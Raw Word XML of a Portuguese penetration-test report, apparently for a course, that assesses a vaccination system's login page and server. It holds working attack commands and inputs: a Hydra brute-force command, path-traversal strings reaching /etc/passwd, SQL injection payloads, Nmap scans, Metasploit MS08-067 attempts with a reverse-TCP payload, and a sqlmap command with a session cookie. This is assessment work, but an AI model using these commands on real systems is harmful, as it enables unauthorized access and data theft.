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>Iteração 1</w:t>
      </w:r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Tela Login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</w:t>
      </w:r>
      <w:r w:rsidR="002A0DD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> total das sessões executadas:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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tilizar a ferramenta Hydra para</w:t>
      </w:r>
      <w:r w:rsidR="003E1ACB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> encontrar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, po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e erro, um login de um usuário e senha válidos para efetuar login no Sistema de Vacina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2A0DD8" w:rsidRDefault="00C12C3D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r a Hydra com os</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> parâmetros</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> login e senha</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> para que ela realize os testes de acesso com força bruta na tela de Login.</w:t>
      </w:r>
      <w:r w:rsidR="00EC2366">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A0DD8" w:rsidRDefault="002A0DD8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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsid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2A0DD8" w:rsidRP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8C6DC7" w:rsidRDefault="00EC2366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-se que o sistema possua </w:t>
      </w:r>
      <w:r w:rsidR="002A0DD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>proteção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C12C3D" w:rsidRDefault="008C6DC7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  <w:r w:rsidR="00C12C3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> A ferramenta está esperando 3 parâmetros quando, a tela de Login só utiliza 2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Inserir um login de usuário válido e possíveis senhas mais comuns utilizadas para acesso</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> de um sistema</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>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Espera-se que o sistema interrompa as Sessão de testes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00CD0164" w:rsidRDefault="008C6DC7" w:rsidP="00C97F3F">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0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hydra -l admin -P forcaBruta IP_do_servidor http-post-form “vacina/login.php:login=^USER^:senha=^PASS^:logado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l” significa o login utilizado no momento. Nesse caso, deve ser sempre “admin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aponta para o arquivo contendo as senhas que a Hydra tentará utilizar para fazer o login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“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564674">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00564674">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00517685">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>O sistema não Passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="00564674">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. As </w:t>
      </w:r>
      <w:r w:rsidR="0048383A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidR="00564674">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>s foram todas executadas sem nenhum tipo de interrupção por parte do sistema alvo.</w:t>
      </w:r>
      <w:r w:rsidR="00564674"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456110" w:rsidRDefault="008C6DC7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Hydra para executa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s utilizando o login “admin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SplashData [1]. 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64674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possua teste</w:t>
      </w:r>
      <w:r w:rsidR="00C97F3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564674" w:rsidRPr="00564674" w:rsidRDefault="00564674" w:rsidP="0056467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hydra -l admin -P forcaBruta IP_do_servidor http-post-form “vacina/login.php:login=^USER^:senha=^PASS^:logado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Deve ser sempre admin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Hydra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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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>O sistema não Passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="00456110">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>. As várias</w:t>
      </w:r>
      <w:r w:rsidR="00C97F3F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> tentativas de login foram</w:t>
      </w:r>
      <w:r w:rsidR="00456110">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> executadas com sucesso conforme mostram as imagens abaixo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00456110" w:rsidRPr="00456110" w:rsidRDefault="00456110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201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Tela Login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</w:t>
      </w:r>
      <w:r w:rsidR="00846A20">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC5B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">através da ferramenta Burp Suite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lastRenderedPageBreak/>
        <w:t>Os resultados obtidos, conforme mostra a figura 2, foram utilizados para executar os testes deste tópic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 w:rsidR="00654DEF"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550964" cy="41338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14" cy="41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46A20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ada a estrutura hierárquica do sistema descrita na figura acima, o objetivo do teste é utilizar entradas maliciosas na URL para </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="0094663B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">conseguir acesso a locais não autorizados a um usuário </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">fora </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="0094663B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>do sistem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login, o seguinte parâmetro é exibido na url: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>vacina/login.php?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>logado</w:t>
      </w:r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B959F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A primeir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é</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> fazer uma requisição ao servidor alterando a url citada anteriormente para: v</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">acina/login.php?logado=../../dir, </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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  <w:r w:rsidR="00DF0646">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs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Espera-se que o sistema bloqueie o acesso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dir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> no cmd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B959F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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 ../../cat /etc/passwd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DF0646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DF0646" w:rsidRDefault="00DF0646" w:rsidP="006C31F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cat /etc/passwd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, no sistema operacional Linux, serve para listar o conteúdo de passwd (local onde ficam armazenados informações de senha dos usuários). </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000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3164B7" w:rsidRPr="00544368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544368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ado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  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6C31FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>comando “../” serve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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</w:t>
      </w:r>
      <w:r w:rsidR="006C31FD" w:rsidRPr="001E119E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Data.js</w:t>
      </w:r>
      <w:r w:rsidRPr="001E119E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>” foi um arquivo descoberto através do escaneamento realizado através do Burp Suite Intercept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/././ </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE"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in=teste&amp;senha=./././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</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>que o sistema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> impeça o acesso</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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in=teste&amp;senha</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">=.. 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que o sistema bloqueie o acesso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Utilizar de forma automatizada o módulo Burp Spider da ferramenta Burp Suite para </w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>realizar um reconhecimento da a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Login: IP_do_servidor/vacina/login.php. A partir dos resultados, verificar se foi possível ter acesso à hierarquia de pastas do sistema mesmo sem efetuar a requisição do login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essar a página do Login utilizando a url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0E26E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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_do_servidor/vacina/login.php. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C36925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não permita</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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Conforme mostra figura 3, não foi possível mapear a estrutura de pastas do sistema apenas acessando a página de Login.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7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54DEF" w:rsidRDefault="00654DEF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4681855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2719E7" w:rsidRDefault="008C6DC7" w:rsidP="00654DEF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0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 3 - Resultado </w:t>
      </w:r>
      <w:r w:rsidR="0048383A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> de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de Login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Login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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>admin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[8,9 e 10] como entrada no campo Login, a fim de modificar a instrução SQL utilizada pelo sistema na consulta de dados referentes ao login de usuários cadastrados. Comentários inline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7067BC" w:rsidRDefault="007067BC" w:rsidP="007067BC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7067BC" w:rsidRPr="007067BC" w:rsidRDefault="007067BC" w:rsidP="007067B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devido tratamento para impedir que os comentários sejam interpretados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007067BC" w:rsidRDefault="007067BC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 w:rsidRPr="003E1ACB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Entradas: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#   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007067BC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 --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login no sistem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 or ‘a’=’a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC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4E230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Default="004E230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e todos os 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>Iteração 2</w:t>
      </w:r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A83EB9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2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00A966EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Atividade: a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nálise do Servidor </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00A63EAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>via N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Nmap para descobrir quais portas estavam abertas no servidor e que </w:t>
      </w:r>
      <w:r w:rsidRPr="001702C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>atividade</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s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="00A966EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s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</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="001702C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ser desenvolvida</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidRPr="001702C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>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4E2307" w:rsidRP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Pr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas abertas, e as versões dos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">softwares que 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707E1B" w:rsidRDefault="008C6DC7" w:rsidP="00707E1B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D6A2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bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>explicar de forma clara, objetiva o resultado obtido (utilize a imagem como ‘ponto’ de explicação).</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs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54DEF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182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C624E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  nmap -sV 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24FD8" w:rsidRDefault="008C6DC7" w:rsidP="00224FD8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="00626AC7" w:rsidRPr="00626AC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>EXPLICAR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624EB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5 - Portas escaneadas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44F31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8A79EE" w:rsidRPr="00D62225" w:rsidRDefault="008A79EE" w:rsidP="00D622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 nmap -sU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2C52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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174B2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.</w:t>
      </w:r>
      <w:r w:rsidR="00C624EB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667375" cy="379349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6 - Portas UDP escaneadas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D6222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erviços:</w:t>
      </w:r>
      <w:r w:rsidR="00D62225" w:rsidRPr="00B71318">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71318">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ntp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> [3] - protocolo de sincronização de relógios usando UDP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8C6DC7" w:rsidRPr="006F694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A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r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tracerout</w:t>
      </w:r>
      <w:r w:rsidRPr="00D62225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8A79EE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P_do_servidor informa o IP onde está hospedada a </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>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A79EE" w:rsidRDefault="00C624EB" w:rsidP="00C624E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73951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7 - Rota traçada pelo Tracerouter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7585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8 - Rota traçada pelo Tracerouter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V -p 1-65535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devem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.O.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6A578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Pr="006A578B" w:rsidRDefault="008C6DC7" w:rsidP="006A578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676900" cy="38512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 -  Versão do software rodando nas portas escaneadas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U -p 1-65535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FE6FEB" w:rsidRPr="00FE6FEB" w:rsidRDefault="008C6DC7" w:rsidP="00FE6F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8C6DC7" w:rsidP="006A578B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705475" cy="4083685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0 - Versão do software rodando nas portas UDP escaneadas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="008A79EE" w:rsidRDefault="00EC5D2B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 xml:space="preserve">Ataque à porta RPC - via </w:t>
      </w:r>
      <w:r w:rsidR="00FE6FEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r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aque à porta RPC descoberta na análise de servidor via Nmap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se conectar à porta 135 usando o framework Metasploit para tentar conseguir privilégios dentro do Windows.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exploit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 xml:space="preserve">Não foi possível obter </w:t>
      </w:r>
      <w:r w:rsidR="001A5B8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>nenhum resul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lastRenderedPageBreak/>
        <w:t xml:space="preserve">O exploit escolhido para testar o caso específico da porta RPC foi o </w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A"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payload a ser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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exploit foi enviado mas não trouxe resultado. Após verificação, </w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>foi constatado que o exploit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ar atacar a porta 445 usando exploits automatizados.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sse caso, o exploit escolhido foi o MS08-67 disponível no caminho </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">/windows/smb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r w:rsidRPr="000D3326">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>microsoft ds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. O payload é o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2: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Pr="00751591" w:rsidRDefault="0048383A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exploit escolhido foi o </w:t>
      </w:r>
      <w:r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 xml:space="preserve">  para testar o caso específico da porta RPC escolhida. O payload a ser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</w:t>
      </w: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áquina atacante via TCP.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2.3  Tela de Login – Sqlmap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lastRenderedPageBreak/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 a ferramenta Sqlmap</w:t>
      </w:r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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Login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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE6FEB" w:rsidRDefault="008C6DC7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color w:val="000000"/>
        </w:rPr>
        <w:t>Verificar se a tela de Login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  <w:r w:rsidR="00FE6FEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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1A5B8E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tela de Login não seja vulnerável à injeção de SQL e consequentemente não seja possível descobrir o nome do banco de dados utilizado pela aplicação.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Para realizar essa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sessão de teste foi necessário utilizar a ferramenta</w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Burp Suite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>momento em que a página do L</w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ogin é acessada.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A5B8E" w:rsidRPr="00834FAA" w:rsidRDefault="001A5B8E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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="00834FAA" w:rsidRDefault="00EC5D2B" w:rsidP="00EC5D2B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05003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E" w:rsidRDefault="008C6DC7" w:rsidP="00870818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lastRenderedPageBreak/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>ros obtidos através do Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w: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654DEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>./Sqlmap.py -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00654DEF">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i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i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">"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 xml:space="preserve">--cookie="PHSESSID=75ce718b37088517cafla733d53c60f"  -b  --current -db </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US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./sqlmap.py” comando utilizado para executar a ferramenta Sqlmap</w:t>
      </w:r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ookie” utilizado para especificar um cookie de sessão válido a ser passado para o Sqlmap</w:t>
      </w:r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urrent -db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EC5D2B" w:rsidRDefault="008C6DC7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>O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="00F52870">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>. A figura</w:t>
      </w:r>
